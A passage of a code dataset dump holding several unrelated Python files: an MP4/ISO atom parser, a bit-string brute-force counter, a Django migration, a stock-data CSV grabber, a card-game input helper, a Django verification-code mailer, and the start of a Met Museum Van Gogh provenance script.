bits'],\n    'stdp' : [True, False, 'sample degradation priority'],\n    'sdtp' : [True, False, 'independent and disposable samples'],\n    'sbgp' : [True, False, 'sample-to-group'],\n    'sgpd' : [True, False, 'sample group description'],\n    'subs' : [True, False, 'sub-sample information'],\n    'mvex' : [False, False, 'movie extends box'],\n    'mehd' : [True, False, 'movie extends header box'],\n    'trex' : [True, False, 'track extends defaults'],\n    'ipmc' : [True, False, 'IPMP control box'],\n    'moof' : [False, False, 'movie fragment'],\n    'mfhd' : [True, False, 'movie fragment header'],\n    'traf' : [False, False, 'track fragment'],\n    'tfhd' : [True, False, 'track fragment header'],\n    'trun' : [True, False, 'track fragment run'],\n    'mfra' : [False, False, 'movie fragment random access'],\n    'tfra' : [True, False, 'track fragment random access'],\n    'mfro' : [True, False, 'movie fragment random access offset'],\n    'mdat' : [True, False, 'media data container'],\n    'free' : [True, False, 'free space'],\n    'skip' : [False, False, 'free space'],\n    'udta' : [False, False, 'user-data'],\n    'cprt' : [True, False, 'copyright etc.'],\n    'meta' : [False, False, 'metadata'],\n    'iloc' : [True, False, 'item location'],\n    'ipro' : [False, False, 'item protection'],\n    'sinf' : [False, False, 'protection scheme information box'],\n    'frma' : [True, False, 'original format box'],\n    'imif' : [True, False, 'IPMP information box'],\n    'schm' : [True, False, 'scheme type box'],\n    'schi' : [True, False, 'scheme information box'],\n    'iinf' : [True, False, 'item information'],\n    'xml ' : [True, False, 'XML container'],\n    'bxml' : [True, False, 'binary XML container'],\n    'pitm' : [True, False, 'primary item reference']\n}\n\ndef IsLeafAtom(atom):\n    if not IsKnownAtom(atom):\n        return True\n\n    return tags[atom[0]][0]\n\ndef IsKnownAtom(atom):\n    return (atom[0] in tags)\n\ndef GetAtomDesc(atom):\n    return tags[atom[0]][2]\n\ndef ReadAtomFromFile(f, start, end):\n    f.seek(start, os.SEEK_SET)\n    if f.tell() != start:\n        return\n\n    buf = f.read(4)\n    if len(buf) < 4:\n        return\n    size = struct.unpack('>I', buf)[0]\n\n    tag = f.read(4)\n    if len(tag) < 4:\n        return\n\n    if size == 0:\n        size = end - f.tell()\n    elif size == 1:\n        buf = f.read(8)\n        if len(buf) < 8:\n            return\n        size = struct.unpack('>Q', buf)[0] - 16\n    else:\n        size -= 8\n\n    if tag == 'uuid':  # tag is exactly 4 bytes, so compare without a trailing space\n        usertype = f.read(16)\n        if len(usertype) < 16:\n            return\n        tag += ':' + usertype\n        size -= 16\n\n    startPtr = f.tell()\n    endPtr = startPtr + size\n    return [tag, startPtr, endPtr]\n\ndef ReadAtomFromBuf(buf, start, end):\n    dataLen = start\n\n    b = buf[dataLen:dataLen+4]\n    if len(b) < 4:\n        return\n    size = struct.unpack('>I', b)[0]\n\n    dataLen += 4\n    tag = buf[dataLen: dataLen+4]\n    if len(tag) < 4:\n        return\n\n    dataLen += 4\n    if size == 0:\n        size = end - dataLen\n    elif size == 1:\n        b = buf[dataLen : dataLen + 8]\n        if len(b) < 8:\n            return\n        size = struct.unpack('>Q', b)[0] - 16\n        dataLen += 8\n    else:\n        size -= 8\n\n    startPtr = dataLen\n    endPtr = startPtr + size\n    return [tag, startPtr, endPtr]\n\ndef GetAtomSize(atom):\n    [tag, startPtr, endPtr] = atom\n\n    size = endPtr - startPtr\n    if size > 4294967295:\n        size += 8\n\n    size += 8\n\n    if tag[0:4] == 'uuid':\n        size += 16\n\n    return size\n\ndef ReadSameLvlAtoms(f, start, end):\n    pos = start\n\n    atoms = []\n    while pos < end:\n        atom = ReadAtomFromFile(f, pos, end)\n        if atom == None:\n            return atoms\n\n        pos += GetAtomSize(atom[:3])\n        atoms.append(atom)\n\n    return atoms\n\ndef ReadRecursiveAtoms(f, start, end):\n    rootAtoms = ReadSameLvlAtoms(f, start, end)\n\n    if rootAtoms 
== None:\n return []\n\n for atom in rootAtoms:\n if IsKnownAtom(atom) and (not IsLeafAtom(atom)):\n atom.append(ReadRecursiveAtoms(f, atom[1], atom[2]))\n\n return rootAtoms\n\ndef FindTagInAtomList(tag, atomList):\n atoms = []\n for atom in atomList:\n if atom[0] == tag:\n atoms.append(atom)\n else:\n if len(atom) > 3:\n atoms += FindTagInAtomList(tag, atom[3])\n return atoms\n\ndef PrintAtomHeadOnLvl(lvl, atom):\n\n printStr = lvl*g_printLvlTab + atom[0]\n\n if g_printFlags & FLAG_PRINT_SIZE_INFO:\n hdrLen = GetAtomSize(atom[:3]) - atom[2] + atom[1]\n printStr += ' [{0}:{1}][{2}:{3}]'.format(atom[1]-hdrLen, atom[1]-1, atom[1], atom[2]-1)\n\n if g_printFlags & FLAG_PRINT_DESC:\n if IsKnownAtom(atom):\n printStr += ' (' + GetAtomDesc(atom) + ')'\n else:\n printStr += ' ()'\n\n\n print(printStr)\n\ndef AnalyzeAtomLstOnLvl(lvl, atomLst, f):\n global g_maxLevel\n\n if lvl >= g_maxLevel:\n return\n\n for atom in atomLst:\n PrintAtomHeadOnLvl(lvl, atom)\n if len(atom) > 3:\n AnalyzeAtomLstOnLvl(lvl+1, atom[3], f)\n else:\n if g_leafInfo:\n info = ReadLeafAtomInfo(f, atom)\n PrintLeafAtomInfo(lvl+1, info)\n\ndef TrimAtomList(atomList, trimTags):\n if len(trimTags) == 0:\n return\n\n rmAtomList = []\n for atom in atomList:\n if atom[0] in trimTags:\n rmAtomList.append(atom)\n if len(atom) > 3:\n TrimAtomList(atom[3], trimTags)\n\n for atom in rmAtomList:\n atomList.remove(atom)\n\ndef PrintLeafAtomInfo(lvl, atomInfo):\n for propr in atomInfo:\n print(lvl*g_printLvlTab + propr[0] + ': ' + propr[1])\n\ndef ReadLeafAtomInfo(f, atom):\n tag = atom[0]\n\n f.seek(atom[1], os.SEEK_SET)\n dataLen = atom[2] - atom[1]\n data = f.read(dataLen)\n if len(data) < dataLen:\n return []\n\n info = []\n if IsKnownAtom(atom) and tags[tag][1]:\n data = ReadAtomExtFromBuf(info, data)\n\n if tag == 'ftyp':\n ReadFtypInfo(info, data)\n elif tag == 'mvhd':\n ReadMvhdInfo(info, data)\n elif tag == 'tkhd':\n ReadTkhdInfo(info, data)\n elif tag == 'mdhd':\n ReadMdhdInfo(info, data)\n elif tag == 'hdlr':\n ReadHdlrInfo(info, data)\n elif tag == 'vmhd':\n ReadVmhdInfo(info, data)\n elif tag == 'smhd':\n ReadSmhdInfo(info, data)\n elif tag == 'hmhd':\n ReadHmhdInfo(info, data)\n elif tag == 'dref':\n ReadDrefInfo(info, data)\n elif tag == 'stts':\n ReadSttsInfo(info, data)\n elif tag == 'ctts':\n ReadCttsInfo(info, data)\n elif tag == 'stsd':\n ReadStsdInfo(info, data)\n elif tag == 'stsz':\n ReadStszInfo(info, data)\n elif tag == 'stz2':\n ReadStz2Info(info, data)\n elif tag == 'stsc':\n ReadStscInfo(info, data)\n elif tag == 'stco':\n ReadStcoInfo(info, data)\n elif tag == 'co64':\n ReadCo64Info(info, data)\n elif tag == 'stss':\n ReadStssInfo(info, data)\n\n return info\n\ndef ReadAtomExtFromBuf(info, data):\n if len(data) < 4:\n return data\n\n info.append(['version', str(struct.unpack('B', data[0])[0])])\n info.append(['flags', HexStr(data[1:4])])\n\n return data[4:]\n\ndef ReadFtypInfo(info, data):\n if len(data) < 8:\n return\n\n info.append(['major brand', data[:4]])\n info.append(['minor version', str(struct.unpack('>I', data[4:8])[0])])\n \n compatBrands = ''\n idx = 8\n while (idx + 4) <= len(data):\n compatBrands += data[idx:idx+4]\n idx += 4\n\n info.append(['compatible brands', compatBrands])\n\ndef HexStr(data):\n hexStr = ''\n for c in data:\n hexStr += '{:0>2x} '.format(ord(c))\n\n return hexStr\n\ndef TimeStr(time):\n year = 1904\n dayLength = 24 * 3600\n\n while True:\n if (year % 4) == 0:\n yearLength = 366 * dayLength\n else:\n yearLength = 365 * dayLength\n\n if time < yearLength:\n break\n\n time -= 
yearLength\n year += 1\n\n\n months = [['jan', 31], ['feb', 28], ['mar' , 31,], ['apr' , 30,], ['may' , 31,], ['jun' , 30,], ['jul' , 31,], ['aug' , 31,], ['sep' , 30,], ['oct' , 31,], ['nov' , 30,], ['dec' , 31]]\n \n day = 1\n idx = 0\n while True:\n [month, daysInMonth] = months[idx]\n if ((year % 4) == 0) and (month == 'feb'):\n daysInMonth += 1\n\n if time < dayLength:\n break\n\n day += 1 \n time -= dayLength\n\n if day > daysInMonth:\n day -= daysInMonth\n idx += 1\n\n hourLength = 3600\n hour = int(time / hourLength)\n time = time % hourLength\n\n minLen = 60\n minute = int(time / minLen)\n time = time % minLen\n\n sec = time\n\n return '{0}:{1}:{2} {3}/{4}/{5}'.format(hour, minute, sec, day, month, year)\n\ndef TimescaleStr(timescale):\n if timescale == 1:\n return '1 s'\n else:\n return '1/' + str(timescale) + ' s'\n\ndef MatHex(mat):\n if len(mat) < 36:\n return ''\n\n idx = 0\n matList = []\n for i in range(9):\n x = mat[idx : idx+4]\n idx += 4\n matList.append(HexStr(x))\n\n return ', '.join(matList)\n\ndef ReadMvhdInfo(info, data):\n if info[0][1] == '1':\n fmt = '>QQIQ'\n else:\n fmt = '>IIII'\n\n dataLen = struct.calcsize(fmt)\n if len(data) < dataLen:\n return\n\n creatTime, modifTime, timescale, duration = struct.unpack(fmt, data[:dataLen])\n info.append(['creation time', TimeStr(creatTime)])\n info.append(['modification time', TimeStr(modifTime)])\n info.append(['timescale', TimescaleStr(timescale)])\n info.append(['duration', str(duration)])\n\n rate = data[dataLen:dataLen+4]\n if len(rate) < 4:\n return\n info.append(['rate', HexStr(rate)])\n dataLen += 4\n\n volume = data[dataLen: dataLen+2]\n if len(volume) < 2:\n return\n info.append(['volume', HexStr(volume)])\n dataLen += 12\n\n matrix = data[dataLen: dataLen + 36]\n if len(matrix) < 36:\n return\n info.append(['matrix', MatHex(matrix)])\n dataLen += 60\n\n buf = data[dataLen: dataLen+4]\n if len(buf) < 4:\n return\n nextTrackID = str(struct.unpack('>I', buf)[0])\n info.append(['next track ID', nextTrackID])\n\ndef ReadTkhdInfo(info, data):\n if info[0][1] == '1':\n fmt = '>QQI4xQ'\n else:\n fmt = '>III4xI'\n\n dataLen = struct.calcsize(fmt)\n if len(data) < dataLen:\n return\n\n creatTime, modifTime, trackID, duration = struct.unpack(fmt, data[:dataLen])\n info.append(['creation time', TimeStr(creatTime)])\n info.append(['modification time', TimeStr(modifTime)])\n info.append(['track ID', str(trackID)])\n info.append(['duration', str(duration)])\n\n dataLen += 8\n\n layer = data[dataLen:dataLen + 2]\n if len(layer) < 2:\n return\n info.append(['layer', str(struct.unpack('>h', layer)[0])])\n dataLen += 2\n\n alternateGroup = data[dataLen:dataLen + 2]\n if len(alternateGroup) < 2:\n return\n info.append(['alternate group', str(struct.unpack('>h', alternateGroup)[0])])\n dataLen += 2\n\n volume = data[dataLen:dataLen + 2]\n if len(volume) < 2:\n return\n info.append(['volume', str(struct.unpack('>h', volume)[0])])\n dataLen += 2\n\n matrix = data[dataLen:dataLen + 36]\n if len(matrix) < 36:\n return\n info.append(['matrix', MatHex(matrix)])\n dataLen += 36\n\n width = data[dataLen:dataLen + 4]\n if len(width) < 4:\n return\n info.append(['width', str(struct.unpack('>I', width)[0])])\n dataLen += 4\n\n height = data[dataLen:dataLen + 4]\n if len(height) < 4:\n return\n info.append(['height', str(struct.unpack('>I', height)[0])])\n \ndef LangStr(lang):\n langStr = ''\n for i in range(3):\n langStr = chr((lang & 0x1f) + 0x60) + langStr\n lang = lang >> 5\n return langStr\n\ndef ReadMdhdInfo(info, data):\n if info[0][1] 
== '1':\n fmt = '>QQIQ'\n else:\n fmt = '>IIII'\n\n dataLen = struct.calcsize(fmt)\n if len(data) < dataLen:\n return\n\n creatTime, modifTime, timescale, duration = struct.unpack(fmt, data[:dataLen])\n info.append(['creation time', TimeStr(creatTime)])\n info.append(['modification time', TimeStr(modifTime)])\n info.append(['timescale', TimescaleStr(timescale)])\n info.append(['duration', str(duration)])\n\n language = data[dataLen:dataLen+2]\n if len(language) < 2:\n return\n info.append(['language', LangStr(struct.unpack('>H', language)[0])])\n\ndef ReadHdlrInfo(info, data):\n global g_trackType\n\n dataLen = 4\n handlerType = data[dataLen: dataLen+4]\n if len(handlerType) < 4:\n return\n info.append(['handler type', handlerType])\n g_trackType = handlerType\n dataLen += 16\n\n name = data[dataLen:]\n info.append(['name', name])\n\ndef ReadVmhdInfo(info, data):\n dataLen = 0\n\n graphicsMode = data[dataLen: dataLen+2]\n if len(graphicsMode) < 2:\n return\n info.append(['graphics mode', str(struct.unpack('>H', graphicsMode)[0])])\n dataLen += 2\n\n opColor = data[dataLen: dataLen+6]\n if len(opColor) < 6:\n return\n op1, op2, op3 = struct.unpack('>HHH', opColor)\n info.append(['opcolor', str(op1) + ' , ' + str(op2) + ' , ' + str(op3)])\n\ndef ReadSmhdInfo(info, data):\n balance = data[:2]\n if len(balance) < 2:\n return\n\n left, right = struct.unpack('BB', balance)\n info.append(['balance', '{0}.{1}'.format(left, right)])\n\ndef ReadHmhdInfo(info, data):\n return\n\ndef ReadDrefInfo(info, data):\n buf = data[:4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n idx = 4\n for i in range(entryCount):\n atom = ReadAtomFromBuf(data, idx, len(data))\n if atom == None:\n return\n info.append([atom[0], '']) \n buf = ReadAtomExtFromBuf(info, data[atom[1]:atom[2]])\n if atom[0] == 'url ':\n location = buf\n info.append(['location', location])\n elif atom[0] == 'urn ':\n [name, location] = buf.split('\\00')\n info.append(['name', name])\n info.append(['location', name])\n else:\n pass\n\n idx = atom[2]\n\ndef ReadSttsInfo(info, data):\n buf = data[:4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n idx = 4\n for i in range(entryCount):\n buf = data[idx:idx+8]\n if len(buf) < 8:\n return\n idx += 8\n sampleCount, sampleDelta = struct.unpack('>II', buf)\n info.append(['sample count', str(sampleCount)])\n info.append(['sample delta', str(sampleDelta)])\n\ndef ReadCttsInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n idx += 4\n\n sampleCountLst = []\n sampleDeltaLst = []\n for i in range(min(g_listLimit, entryCount)):\n buf = data[idx:idx+8]\n if len(buf) < 8:\n return\n idx += 8\n \n sampleCount, sampleDelta = struct.unpack('>II', buf)\n sampleCountLst.append('{0: >4}'.format(sampleCount))\n sampleDeltaLst.append('{0: >4}'.format(sampleDelta))\n\n info.append(['sample count', ' '.join(sampleCountLst)])\n info.append(['sample offset', ' '.join(sampleDeltaLst)])\n\ndef ReadStsdInfo(info, data):\n global g_trackType\n\n buf = data[:4]\n if len(buf) < 4:\n return\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n idx = 4\n for i in range(entryCount):\n atom = ReadAtomFromBuf(data, idx, len(data))\n if atom == None:\n return\n info.append([atom[0], ''])\n\n idx = atom[1] + 6\n buf = data[idx:idx+2]\n if len(buf) < 2:\n 
return\n dataReferenceIndex = struct.unpack('>H', buf)[0]\n info.append(['data reference index', str(dataReferenceIndex)])\n idx += 2\n\n\n if g_trackType == 'soun':\n ParseAudioSampleEntry(info, data[idx:atom[2]])\n elif g_trackType == 'vide':\n ParseVideoSampleEntry(info, data[idx:atom[2]])\n elif g_trackType == 'hint':\n ParseHintSampleEntry(info, data[idx:atom[2]])\n else:\n return\n\n g_trackType = None\n\n idx = atom[2]\n\ndef ParseAudioSampleEntry(info, data):\n idx = 8\n\n channelCount = data[idx:idx+2]\n if len(channelCount) < 2:\n return\n info.append(['channel count', str(struct.unpack('>H', channelCount)[0])])\n idx += 2\n\n sampleSize = data[idx:idx+2]\n if len(sampleSize) < 2:\n return\n info.append(['sample size', str(struct.unpack('>H', sampleSize)[0])])\n idx += 6\n\n sampleRate = data[idx:idx+4]\n if len(sampleRate) < 4:\n return\n info.append(['sample rate', str(struct.unpack('>I', sampleRate)[0])])\n\ndef ParseVideoSampleEntry(info, data):\n idx = 16\n width = data[idx:idx+2]\n if len(width) < 2:\n return\n info.append(['width', str(struct.unpack('>H', width)[0])])\n idx += 2\n\n height = data[idx:idx+2]\n if len(height) < 2:\n return\n info.append(['height', str(struct.unpack('>H', height)[0])])\n idx += 2\n\n hRes = data[idx:idx+4]\n if len(hRes) < 4:\n return\n info.append(['horizontal resolution', HexStr(hRes)])\n idx += 4\n\n vRes = data[idx:idx+4]\n if len(vRes) < 4:\n return\n info.append(['vertical resolution', HexStr(vRes)])\n idx += 8\n\n frameCount = data[idx:idx+2]\n if len(frameCount) < 2:\n return\n info.append(['frame count', str(struct.unpack('>H', frameCount)[0])])\n idx += 2\n\n compressorName = data[idx:idx+32]\n if len(compressorName) < 32:\n return\n info.append(['compressor name', compressorName])\n idx += 32\n\n depth = data[idx:idx+2]\n if len(depth) < 2:\n return\n info.append(['depth', HexStr(depth)])\n\ndef ParseHintSampleEntry(info, data):\n pass\n\ndef ReadStszInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n sampleSize = struct.unpack('>I', buf)[0]\n idx += 4\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n sampleCount = struct.unpack('>I', buf)[0]\n info.append(['sample count', str(sampleCount)])\n idx += 4\n\n if sampleSize != 0:\n info.append(['sample size', str(sampleSize)])\n return\n\n sampleSizes = []\n for i in range(min(g_listLimit, sampleCount)):\n entrySize = data[idx:idx+4]\n if len(entrySize) < 4:\n return\n sampleSizes.append(str(struct.unpack('>I', entrySize)[0]))\n idx += 4\n info.append(['sample sizes', ','.join(sampleSizes)])\n\ndef ReadStz2Info(info, data):\n pass\n\ndef ReadStscInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n idx += 4\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n firstChunkLst = []\n samplesPerChunkLst = []\n sampleDescriptionIndexLst = []\n for i in range(min(g_listLimit, entryCount)):\n buf = data[idx:idx+12]\n if len(buf) < 12:\n return\n firstChunk, samplesPerChunk, sampleDescriptionIndex = struct.unpack('>III', buf)\n\n firstChunkLst.append('{0: >5}'.format(firstChunk))\n samplesPerChunkLst.append('{0: >5}'.format(samplesPerChunk))\n sampleDescriptionIndexLst.append('{0: >5}'.format(sampleDescriptionIndex))\n\n idx += 12\n\n info.append(['first chunk ', ' '.join(firstChunkLst)])\n info.append(['samples per chunk ', ' '.join(samplesPerChunkLst)])\n info.append(['sample description index list', ' 
'.join(sampleDescriptionIndexLst)])\n\ndef ReadStcoInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n idx += 4\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n chunkOffsetLst = []\n for i in range(min(entryCount, g_listLimit)):\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n chunkOffset = struct.unpack('>I', buf)[0]\n chunkOffsetLst.append('{0: >5}'.format(chunkOffset))\n idx += 4\n\n info.append(['chunk offset', ' '.join(chunkOffsetLst)])\n\ndef ReadCo64Info(info, data):\n pass\n\ndef ReadStssInfo(info, data):\n global g_listLimit\n\n idx = 0\n\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n idx += 4\n entryCount = struct.unpack('>I', buf)[0]\n info.append(['entry count', str(entryCount)])\n\n sampleNumberLst = []\n for i in range(min(entryCount, g_listLimit)):\n buf = data[idx:idx+4]\n if len(buf) < 4:\n return\n sampleNumber = struct.unpack('>I', buf)[0]\n sampleNumberLst.append('{0: >5}'.format(sampleNumber))\n idx += 4\n\n info.append(['sample number', ' '.join(sampleNumberLst)])","sub_path":"iso.py","file_name":"iso.py","file_ext":"py","file_size_in_byte":23489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"145011356","text":"from bit_string_generator import BitStringGenerator\n\n\ndef brute_force(long_string_len, short_string_len):\n result_dict = {''.join(str(y)\n for y in x): 0 for x in BitStringGenerator(short_string_len)}\n for long_list in BitStringGenerator(long_string_len):\n long_string = ''.join(str(x) for x in long_list)\n for short_list in BitStringGenerator(short_string_len):\n short_string = ''.join(str(x) for x in short_list)\n if short_string in long_string:\n result_dict[short_string] = result_dict[short_string]+1\n\n # print(result_dict)\n return result_dict\n","sub_path":"brute_force_solution.py","file_name":"brute_force_solution.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"31071281","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('camo', '0094_auto_20160225_2205'),\n ('panel', '0016_auto_20160302_0948'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PilotAircraft',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('aircraft', models.ForeignKey(verbose_name='Statek powietrzny', to='camo.Aircraft')),\n ('pilot', models.ForeignKey(verbose_name='Pilot', to='panel.Pilot')),\n ],\n ),\n migrations.CreateModel(\n name='PilotFlightType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('flight_type', models.CharField(verbose_name='Rodzaj lotu', max_length=3)),\n ('pilot', models.ForeignKey(verbose_name='Pilot', to='panel.Pilot')),\n ],\n ),\n migrations.AlterField(\n model_name='operation',\n name='fuel_source',\n field=models.CharField(verbose_name='Źródło paliwa', default='unknown', max_length=10),\n ),\n ]\n","sub_path":"panel/migrations/0017_auto_20160305_1203.py","file_name":"0017_auto_20160305_1203.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"81201120","text":"import requests\nimport csv\n\n#get data from JSON\n\ncode 
= 'BBY'\nimport urllib.parse  # urlencode is used below but urllib was never imported\nmain_api = ('https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=' +\n            code + '&apikey=XXXXXXXXXXXXXXXXXX')\nurl = main_api + '&' + urllib.parse.urlencode({'NYSE': code})  # join with '&' so the extra parameter does not run into the apikey value\n\njson_data = requests.get(url).json()\n\ndata = []\n\nfor key,value in json_data['Time Series (Daily)'].items():\n    date = key\n    sopen = value[\"1. open\"]\n    high = value[\"2. high\"]\n    low = value[\"3. low\"]\n    close = value[\"4. close\"]\n    volume = value[\"5. volume\"]\n    data.append(date) \n    data.append(sopen) \n    data.append(high) \n    data.append(low) \n    data.append(close)\n    data.append(volume)\n#divide the flat list of data into groups of six, each containing the values above\ndef divide_chunks(n): \n    for i in range(0, len(data), n): \n        yield data[i:i + n] \n    \nchunks = list(divide_chunks(6))\nchunks.pop(-1)\n\nwith open('C:\\\\python_work\\\\BBY-stockdata.csv', mode='w') as stockdata:\n    stockdatacsv = csv.writer(stockdata, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n    # write each chunk as one CSV row; the with-block closes the file afterwards\n    for chunk in chunks:\n        print(chunk)\n        stockdatacsv.writerow(chunk)\n    print(\"Done!\")\n\n\n\n","sub_path":"grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"241169626","text":"from gamecore import *\r\n\r\ncolor_dictionary = { # Dictionary that maps the colour aliases to terminal colours\r\n    \"azul\" : fg.blue,\r\n    \"rojo\" : fg.red,\r\n    \"verde\" : fg.green,\r\n    \"amarillo\" : fg.yellow\r\n}\r\n\r\ndef get_color(card_color): # Function that returns a terminal colour from a colour alias\r\n    return color_dictionary.get(card_color)\r\n\r\ndef get_choice(possible_choices): # This is a function to get choices from the player\r\n    count = 0\r\n    for choice in possible_choices:\r\n        print(f\"[{count}] {choice}\")\r\n        count += 1\r\n    while True:\r\n        try:\r\n            choice = int(input(\"Opcion > \"))\r\n            selected_choice = possible_choices[choice]\r\n            return selected_choice\r\n        except ValueError:\r\n            raise_error(\"Debes seleccionar un numero validos\")\r\n        except IndexError:\r\n            raise_error(\"Debes seleccionar una opcion valida\")\r\n","sub_path":"gamecore/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"204059343","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport smtplib\nimport email.mime.multipart\nimport email.mime.text\nfrom django.http import HttpResponseRedirect\nimport random\nfrom user.models import Userinfo\nfrom django.shortcuts import render\n\n\ndef generate_verification_code():\n    code_list = []\n    for i in range(2):\n        random_num = random.randint(0, 9)\n        a = random.randint(65, 90)\n        b = random.randint(97, 122)\n        random_uppercase_letter = chr(a)\n        random_lowercase_letter = chr(b)\n        code_list.append(str(random_num))\n        code_list.append(random_uppercase_letter)\n        code_list.append(random_lowercase_letter)\n    verification_code = ''.join(code_list)\n    return verification_code\n\n\ndef sendmail(request):\n    if request.method == \"POST\":\n        useremail = request.POST.get(\"useremail\").strip()\n\n        try:\n            result = Userinfo.objects.get(useremail=useremail)\n            if result:\n                msg = email.mime.multipart.MIMEMultipart()\n                msg['from'] = 'test@test.com'\n                msg['to'] = useremail\n                msg['subject'] = 'Verification Code'\n                content = 'verification code: ' + str(generate_verification_code())\n                
txt = email.mime.text.MIMEText(content)\n msg.attach(txt)\n smtp = smtplib.SMTP()\n smtp.connect('smtp.exmail.qq.com', '25')\n smtp.login('test@test.com', 'test123')\n smtp.sendmail('test@test.com', useremail, str(msg))\n smtp.quit()\n filename = useremail.split('@')[0]\n filepath = \"/data/AdminLTE/user/verification_code/\" + filename\n with open(filepath, 'w') as f:\n f.write(content)\n return render(request, \"modify-password.html\", {\"useremail\": useremail})\n except Userinfo.DoesNotExist:\n content = \"此邮箱未注册,请重新输入!\"\n return render(request, \"forget-password.html\", {\"content\": content})\n else:\n return HttpResponseRedirect(\"/login\")\n","sub_path":"AdminLTE/user/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"326610378","text":"import pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport os\ndir = os.path.dirname(__file__)\nimport io\n\nimport requests\nimport googlemaps\n\nimport time\nstart_time = time.time()\n\nimport datetime\nnow = datetime.datetime.now()\n\nfrom geotext import GeoText\n\nimport urllib.request as req\n\nimport re\n\nimport json\n\n\n\"\"\"\n# def get_image(row):\n# return row['image_url'].split('/')[-1]\n# vanGoghProvenance['image'] = vanGoghProvenance.apply(get_image, axis=1)\n\n# Save images into assets folder\n# for x in vanGoghProvenance.index.values:\n# imageURL = vanGoghProvenance.iloc[x]['image_url']\n# image = vanGoghProvenance.iloc[x]['image']\n# imageFilePath = os.path.join(dir,'assets','images',image)\n# # print(imageFilePath)\n# req.urlretrieve(imageURL,imageFilePath)\n\n# Create thumbnails of these images one by one using Image Magick on terminal\n# http://www.imagemagick.org/Usage/thumbnails/#cut\n# convert -define jpeg:size=500x500 DT1567.jpg -thumbnail 500x500^ -gravity center -extent 500x500 ../thumbnails/DT1567.jpg\n\"\"\"\n\n# metObjectsUrl = 'https://media.githubusercontent.com/media/metmuseum/openaccess/master/MetObjects.csv'\n# metObjectsContent = requests.get(metObjectsUrl).content\n# metObjectsFull = pd.read_csv(io.StringIO(metObjectsContent.decode('utf-8')))\n\nvanGoghProvenanceJSON = os.path.join(dir,'assets','metObjectsVanGogh.json')\nvanGoghProvenance = pd.read_json(vanGoghProvenanceJSON)\n# vanGoghProvenance = vanGoghProvenance[['image_url','object_number','provenance','exhibitionHistory','image']]\nprovenanceList = []\nexhibitionHistoryList = []\nfor index in vanGoghProvenance.index.values:\n\n ### PROVENANCE ###\n objectNumber = vanGoghProvenance['object_number'][index]\n prov = vanGoghProvenance['provenance'][index]\n prov = prov.replace('[MMA 1995.535]','') ## brackets delineate line break from one owner to another, so this causes an issue in https://metmuseum.org/art/collection/search/437998\n prov = prov.replace('[','(')\n prov = prov.replace(']',')')\n\n if objectNumber == 459123:\n splitProvList = prov.split(';')\n else:\n splitProvList = prov.split(');')\n\n\n for p in range(len(splitProvList)):\n pid = str(objectNumber) + '_' + str(p)\n provItem = splitProvList[p]\n provItem = provItem.strip() # remove leading and trailing spaces\n provItem = provItem.replace(' (',', ')\n provItem = provItem.replace('(','')\n provItem = provItem.replace(',000','000') # remove commas in things that may be dollar amounts, which will screw up my splitting later on\n if (objectNumber == 437980 and p == 5):\n provItem = provItem.replace('bought in 
Paris;','bought in Paris')\n provItemMain = provItem.split(';')[1]\n else :\n provItemMain = provItem.split(';')[0]\n provItemMainSplit = provItemMain.split(',')\n\n ## if there are three items in the first chunk of each provenance, it is usually organized as owner, location, year\n if len(provItemMainSplit) == 3 :\n\n ## Fringe Cases where the below doesn't work ##\n if (objectNumber == 436536 and p == 8):\n provOwner = 'Wildenstein'\n provLocation = 'London'\n provYear = '1943'\n elif (objectNumber == 459123 and p < 5) : #rows 2,3,and 4 for 459123 are wonky. I will need to make a guess for the year on one.\n if (p==2):\n provOwner = provItemMainSplit[0].strip()\n provLocation = provItemMainSplit[1].strip().replace(')','')\n provYear = provItemMainSplit[2].strip()\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n elif (p==3):\n provOwner = provItemMainSplit[0].strip()\n provLocation = 